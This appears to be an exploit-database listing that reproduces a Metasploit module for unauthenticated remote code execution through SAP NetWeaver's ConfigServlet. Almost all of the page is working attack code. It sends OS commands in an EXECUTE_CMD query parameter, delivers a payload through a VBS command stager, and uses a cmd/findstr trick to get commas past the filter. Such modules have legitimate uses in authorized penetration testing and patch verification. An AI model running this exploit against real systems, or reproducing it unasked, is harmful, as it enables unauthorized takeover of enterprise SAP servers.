SAP ConfigServlet Remote Code Execution



EKU-ID: 3188 CVE: OSVDB-ID: 92704
Author: Andras Kabai Published: 2013-05-02 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit
	Rank = GreatRanking

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::CmdStagerVBS
	include Msf::Exploit::FileDropper

	def initialize(info = {})
		super(update_info(info,
			'Name'            => 'SAP ConfigServlet Remote Code Execution',
			'Description'     => %q{
				This module allows remote code execution via operating system commands through the
				SAP ConfigServlet without any authentication. This module has been tested successfully
				with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2.
			},
			'Author'          =>
				[
					'Dmitry Chastuhin', # Vulnerability discovery (based on the reference presentation)
					'Andras Kabai' # Metasploit module
				],
			'License'         => MSF_LICENSE,
			'References'      =>
				[
					[ 'OSVDB', '92704'],
					[ 'EDB', '24996'],
					[ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf']
				],
			'DisclosureDate' => 'Nov 01 2012', # Based on the reference presentation
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows generic',
						{
							'Arch' => ARCH_X86
						}
					]
				],
			'DefaultTarget'  => 0,
			'Privileged'     => false
			))

		register_options(
			[
				Opt::RPORT(50000),
				OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/ctc/servlet'])
			], self.class)

		register_advanced_options(
			[
				OptBool.new('DELETE_FILES', [ true, 'Delete the dropped files after exploitation', true ])
			], self.class)
	end

	def check
		uri = normalize_uri(target_uri.path, 'ConfigServlet')
		begin
			res = send_evil_request(uri, "whoami", 20)
		rescue
			Exploit::CheckCode::Unknown
		end
		if !res
			Exploit::CheckCode::Unknown
		elsif res.body.include?("Process created")
			Exploit::CheckCode::Vulnerable
		else
			Exploit::CheckCode::Safe
		end
	end

	def exploit
		print_status("#{rhost}:#{rport} - Exploiting remote system")
		uri = normalize_uri(target_uri.path, 'ConfigServlet')

		execute_cmdstager( { :linemax => 1500, :nodelete => !datastore['DELETE_FILES'], :sap_configservlet_uri => uri })
	end

	def execute_command(cmd, opts)
		commands = cmd.split(/&/)
		commands.each do |command|
			timeout = 20
			if datastore['DELETE_FILES'] and command =~ /shell\.run \"(.*)\"/
				register_file_for_cleanup($1)
			end
			if command.include?(".vbs") and command.include?(",")
				# because the comma is bad character and the VBS stager contains commas it is necessary to "create" commas without directly using them
				# using the following command line trick it is possible to echo commas into the right places
				command.gsub!(",", "%i")
				command = "cmd /c FOR /F \"usebackq tokens=2 delims=)\" %i IN (\`\"ping -n 1 127.0.0.1| findstr )\"\`) DO " + command
			else
				command = "cmd /c " + command
			end
			if command.include?("cscript")
				# in case of bigger payloads the VBS stager could run for longer time as it needs to decode lot of data
				# increaste timeout value when the VBS stager is called
				timeout = 120
			end
			vprint_status("Attempting to execute: #{command}")
			send_evil_request(opts[:sap_configservlet_uri], command, timeout)
		end
	end

	def send_evil_request(uri, cmd, timeout)
		begin
			res = send_request_cgi(
				{
					'uri' => uri,
					'method' => 'GET',
					'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(cmd)
				}, timeout)

			if !res
				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Exploit failed.")
			end

			if res.code != 200
				vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
				fail_with(Exploit::Failure::UnexpectedReply, "#{rhost}:#{rport} - Exploit failed.")
			end
		rescue ::Rex::ConnectionError
			fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the server.")
		end

		if not res.body.include?("Process created")
			vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
			fail_with(Exploit::Failure::PayloadFailed, "#{rhost}:#{rport} - Exploit failed.")
		end
		return res
	end
end